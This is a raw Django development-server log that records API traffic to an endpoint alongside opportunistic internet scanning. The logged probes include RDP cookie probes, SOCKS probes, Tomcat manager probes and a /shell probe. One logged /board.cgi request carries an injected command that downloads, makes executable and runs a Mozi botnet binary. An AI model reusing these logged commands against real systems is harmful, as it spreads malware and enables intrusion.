  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 12:54:50] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 12:54:57] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
[12/Dec/2020 12:55:22] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 12:55:39] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 12:56:10] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 12:58:15] "POST /api/vi/ddobakis/ HTTP/1.1" 201 200
[12/Dec/2020 13:08:03] "POST /api/vi/ddobakis/ HTTP/1.1" 201 215
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 63113)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[12/Dec/2020 14:04:34] "GET / HTTP/1.0" 404 2173
Not Found: /board.cgi
[12/Dec/2020 14:42:39] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron" 404 2312
[12/Dec/2020 14:58:21] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 14:58:21] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 16:18:39] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 16:18:39] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[12/Dec/2020 16:43:36] "GET /manager/html HTTP/1.1" 400 61530
Not Found: /
[12/Dec/2020 17:28:23] "GET / HTTP/1.1" 404 2136
[12/Dec/2020 17:34:20] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 17:34:20] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 18:07:45] code 400, message Bad request syntax ("\x16\x03\x01\x01\x00\x01\x00\x00ü\x03\x03M\x17Ô\x11¹À|\x11í;%^¦u±;Cv\x86º(ÌíÏ|Ò\x0fDý\x004í ä+\x1dùïkZ·á\x0b\x8eº¹\\Ò¨A\x8b\r\x1d\x95\x04¨§\x81\x80Ì¢:'\x12\xad\x00&À/À0À+À,Ì¨Ì©À\x13À\tÀ\x14À")
[12/Dec/2020 18:07:45] You're accessing the development server over HTTPS, but it only supports HTTP.

[12/Dec/2020 18:21:43] "GET /api/vi/ddobakis/ HTTP/1.1" 200 109598
[12/Dec/2020 18:21:43] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[12/Dec/2020 18:21:43] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[12/Dec/2020 18:21:43] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[12/Dec/2020 18:21:43] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[12/Dec/2020 18:21:43] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[12/Dec/2020 18:21:44] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[12/Dec/2020 18:21:47] "GET /favicon.ico HTTP/1.1" 404 2228
[12/Dec/2020 18:43:14] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 18:43:14] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 18:51:52] "GET /api/vi/ddobakis HTTP/1.1" 301 0
[12/Dec/2020 18:51:52] "GET /api/vi/ddobakis/ HTTP/1.1" 200 109598
[12/Dec/2020 18:51:53] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[12/Dec/2020 18:51:53] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[12/Dec/2020 18:51:53] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[12/Dec/2020 18:51:53] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[12/Dec/2020 18:51:53] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[12/Dec/2020 18:51:53] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[12/Dec/2020 18:51:53] "GET /favicon.ico HTTP/1.1" 404 2228
[12/Dec/2020 19:52:59] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 19:52:59] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 20:58:33] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 20:58:33] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 21:51:52] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 21:52:13] "GET /api/vi/ddobakis/ HTTP/1.1" 200 110105
[12/Dec/2020 21:52:13] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[12/Dec/2020 21:52:13] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[12/Dec/2020 21:52:13] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[12/Dec/2020 21:52:13] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:13] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[12/Dec/2020 21:52:14] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[12/Dec/2020 21:52:58] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 21:53:02] "GET /api/vi/ddobakis/ HTTP/1.1" 200 110612
[12/Dec/2020 21:53:07] "GET /api/vi/ddobakis/ HTTP/1.1" 200 110612
[12/Dec/2020 21:53:22] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 21:53:25] "GET /api/vi/ddobakis/ HTTP/1.1" 200 111119
[12/Dec/2020 21:53:26] "GET /api/vi/ddobakis/ HTTP/1.1" 200 111119
[12/Dec/2020 21:53:26] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[12/Dec/2020 21:53:26] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
[12/Dec/2020 21:53:39] "POST /api/vi/ddobakis/ HTTP/1.1" 201 216
[12/Dec/2020 21:53:43] "GET /api/vi/ddobakis/ HTTP/1.1" 200 111638
Not Found: /favicon.ico
[12/Dec/2020 21:53:54] "HEAD /favicon.ico HTTP/1.1" 404 2229
Not Found: /favicon.ico
[12/Dec/2020 21:53:54] "HEAD /favicon.ico HTTP/1.1" 404 2229
[12/Dec/2020 21:53:54] "GET /api/vi/ddobakis/ HTTP/1.1" 200 43376
[12/Dec/2020 21:53:54] "GET /api/vi/ddobakis/ HTTP/1.1" 200 43376
----------------------------------------
Exception happened during processing of request from ('61.82.166.244', 62740)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('61.82.166.244', 62744)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[12/Dec/2020 22:01:30] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Dec/2020 22:01:30] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Dec/2020 23:07:24] code 400, message Bad request syntax ('{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"x"}}')
[12/Dec/2020 23:07:24] "{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"x"}}" 400 -
[12/Dec/2020 23:09:21] code 400, message Bad request syntax ('{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"x"}}')
[12/Dec/2020 23:09:21] "{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"x"}}" 400 -
Not Found: /boaform/admin/formLogin
[13/Dec/2020 00:24:26] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 2287
Not Found: /
[13/Dec/2020 00:27:47] "GET / HTTP/1.1" 404 2131
Not Found: /
[13/Dec/2020 01:38:07] "GET / HTTP/1.1" 404 2136
Not Found: /actuator/health
[13/Dec/2020 02:09:12] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /
[13/Dec/2020 05:39:52] "GET / HTTP/1.0" 404 2136
Not Found: /admin/connection/
[13/Dec/2020 07:18:24] "GET /admin/connection/ HTTP/1.1" 404 3937
Not Found: /favicon.ico
[13/Dec/2020 07:18:24] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /admin/connection/
[13/Dec/2020 07:19:53] "GET /admin/connection/ HTTP/1.1" 404 3937
Not Found: /favicon.ico
[13/Dec/2020 07:19:54] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /admin/connection/
[13/Dec/2020 07:21:05] "GET /admin/connection/ HTTP/1.1" 404 3937
Not Found: /favicon.ico
[13/Dec/2020 07:21:05] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /admin/connection/
[13/Dec/2020 07:21:20] "GET /admin/connection/ HTTP/1.1" 404 3937
Not Found: /favicon.ico
[13/Dec/2020 07:21:21] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /http:/icanhazip.com/
[13/Dec/2020 07:38:18] "GET http://icanhazip.com/ HTTP/1.1" 404 1673
----------------------------------------
Exception happened during processing of request from ('37.9.13.118', 17349)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[13/Dec/2020 10:29:24] "GET / HTTP/1.0" 404 2173
Not Found: /
[13/Dec/2020 10:35:57] "GET / HTTP/1.1" 404 2136
Not Found: /hudson
[13/Dec/2020 11:50:30] "GET /hudson HTTP/1.1" 404 2172
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[13/Dec/2020 14:09:10] "GET /manager/html HTTP/1.1" 400 61530
Not Found: /
[13/Dec/2020 14:17:58] "GET / HTTP/1.1" 404 2136
[13/Dec/2020 16:02:17] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[13/Dec/2020 16:02:17] "  /*à     Cookie: mstshash=Administr" 400 -
[13/Dec/2020 16:46:06] code 400, message Bad request syntax ('\x05\x01\x00')
[13/Dec/2020 16:46:06] " " 400 -
[13/Dec/2020 16:46:11] code 400, message Bad request syntax ('\x05\x01\x00')
[13/Dec/2020 16:46:11] " " 400 -
[13/Dec/2020 16:46:18] code 400, message Bad request syntax ('\x05\x01\x00')
[13/Dec/2020 16:46:18] " " 400 -
[13/Dec/2020 16:46:51] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[13/Dec/2020 16:46:51] " P¼Òã " 400 -
[13/Dec/2020 16:46:58] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[13/Dec/2020 16:46:58] " P¼Òã " 400 -
[13/Dec/2020 16:47:05] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[13/Dec/2020 16:47:05] " P¼Òã " 400 -
Not Found: /http:/5.188.210.227/echo.php
[13/Dec/2020 16:48:09] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 1697
Not Found: /
[13/Dec/2020 16:59:17] "GET / HTTP/1.1" 404 2131
[13/Dec/2020 17:05:43] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[13/Dec/2020 17:05:43] "  +&à     Cookie: mstshash=hello" 400 -
Not Found: /
[13/Dec/2020 18:30:56] "GET / HTTP/1.1" 404 2136
Not Found: /manager/html
[13/Dec/2020 19:02:53] "GET /manager/html HTTP/1.1" 404 2190
[13/Dec/2020 19:43:55] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[13/Dec/2020 19:43:55] "  /*à     Cookie: mstshash=Administr" 400 -
[13/Dec/2020 20:08:59] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[13/Dec/2020 20:08:59] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /manager/html
[13/Dec/2020 20:43:48] "GET /manager/html HTTP/1.1" 404 2190
----------------------------------------
Exception happened during processing of request from ('103.45.182.184', 1199)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /manager/html
[13/Dec/2020 21:28:34] "GET /manager/html HTTP/1.1" 404 2190
----------------------------------------
Exception happened during processing of request from ('60.169.81.186', 3639)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /shell
[13/Dec/2020 21:28:35] "GET /shell?uname%20-a HTTP/1.1" 404 2180
----------------------------------------
Exception happened during processing of request from ('60.169.81.186', 3839)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('162.142.125.40', 37082)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[13/Dec/2020 21:57:13] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('162.142.125.40', 36640)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[13/Dec/2020 21:57:14] "GET / HTTP/1.1" 404 2136
[13/Dec/2020 22:01:27] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[13/Dec/2020 22:01:27] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Dec/2020 00:08:48] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 00:08:48] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Dec/2020 00:09:17] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 00:09:17] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Dec/2020 02:09:26] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 02:09:26] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Dec/2020 04:01:40] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 04:01:40] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Dec/2020 04:04:32] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 04:04:32] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /actuator/health
[14/Dec/2020 05:21:40] "GET /actuator/health HTTP/1.1" 404 2199
[14/Dec/2020 06:17:36] code 400, message Bad request syntax ('\x04\x01\x00\x19h/$!\x00')
[14/Dec/2020 06:17:36] " h/$! " 400 -
[14/Dec/2020 06:17:36,724] - Broken pipe from ('80.82.65.74', 60542)

[14/Dec/2020 06:18:37] code 400, message Bad request syntax ('\x05\x01\x00')
[14/Dec/2020 06:18:37] " " 400 -
[14/Dec/2020 06:18:37,020] - Broken pipe from ('80.82.65.74', 50390)

Not Found: /
[14/Dec/2020 06:19:35] "HEAD / HTTP/1.0" 404 2174
Not Found: /system_api.php
[14/Dec/2020 06:19:35] "GET /system_api.php HTTP/1.1" 404 2196
Not Found: /c/version.js
[14/Dec/2020 06:19:36] "GET /c/version.js HTTP/1.1" 404 2190
[14/Dec/2020 06:19:37] code 400, message Bad request syntax ('\x05\x01\x00')
[14/Dec/2020 06:19:37] " " 400 -
[14/Dec/2020 06:19:37,292] - Broken pipe from ('80.82.65.74', 38496)

Not Found: /streaming/clients_live.php
[14/Dec/2020 06:19:37] "GET /streaming/clients_live.php HTTP/1.1" 404 2232
Not Found: /stalker_portal/c/version.js
[14/Dec/2020 06:19:38] "GET /stalker_portal/c/version.js HTTP/1.1" 404 2235
Not Found: /client_area/
[14/Dec/2020 06:19:39] "GET /client_area/ HTTP/1.1" 404 2190
Not Found: /stalker_portal/c/
[14/Dec/2020 06:19:40] "GET /stalker_portal/c/ HTTP/1.1" 404 2205
Not Found: /
[14/Dec/2020 06:55:54] "GET / HTTP/1.0" 404 2173
[14/Dec/2020 07:55:16] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Dec/2020 07:55:16] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[14/Dec/2020 08:06:35] "GET / HTTP/1.0" 404 2173
[14/Dec/2020 08:14:22] "GET /api/vi/ddobakis/ HTTP/1.1" 200 111638
[14/Dec/2020 08:14:22] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[14/Dec/2020 08:14:22] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
Not Found: /favicon.ico
[14/Dec/2020 08:14:23] "GET /favicon.ico HTTP/1.1" 404 2228
[14/Dec/2020 08:14:57] "POST /api/vi/ddobakis/ HTTP/1.1" 201 9644
[14/Dec/2020 08:15:03] "POST /api/vi/ddobakis/ HTTP/1.1" 201 9644
[14/Dec/2020 08:15:06] "GET /api/vi/ddobakis/ HTTP/1.1" 200 112648
Watching for file changes with StatReloader
[14/Dec/2020 08:24:52] "GET /api/vi/ddobakis/ HTTP/1.1" 200 112661
